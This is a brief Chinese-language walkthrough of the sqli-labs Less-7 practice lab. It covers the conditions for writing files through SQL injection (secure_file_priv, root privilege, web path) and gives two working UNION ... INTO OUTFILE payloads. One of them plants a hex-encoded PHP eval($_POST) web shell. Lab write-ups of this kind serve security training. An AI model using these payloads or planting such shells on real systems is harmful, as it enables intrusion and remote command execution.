sqli-labs之Less-7 GET注入写shell
验证注入点:单引号报错,'))
根据提示,是想让我们试试写shell
第一个条件 secure_file_priv
写shell即MySQL需要对外写文件,但默认MySQL是不允许outfile来导出数据的,先动手在MySQL确认一下。
MySQL特性,secure_file_priv 对读写文件的影响,此开关默认为NULL,即不允许导入导出。
secure-file-priv参数是用来限制LOAD DATA,SELECT ...OUTFILE,and LOAD_FILE()传到哪个指定目录的
1、当secure_file_priv的值为null,表示限制mysqld不允许导入|导出
2、当secure_file_prv的值为/tmp/,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
3、当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制windows下:修改my.ini 在[mysqld]内加入secure_file_priv =
linux下:修改my.cnf 在[mysqld]内加入secure_file_priv =重启mysql
第二个条件 必须是root权限
第三个条件 必须知道网站路径
利用报错得到网站路径;
利用函数select @@datadir得到mysql的路径,再推导网站路径
payload:
id=1')) union select null,0x3c3f706870206576616c28245f504f53545b27707764275d293b3f3e,null into outfile 'E:/PhpStudent/phpstudy_pro/WWW/sqlilabs/Less-7/shell.php' --+
id=1')) union select 1,"<?php phpinfo(); ?>",3 into outfile "E:\\PhpStudent\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\shell.php" --+
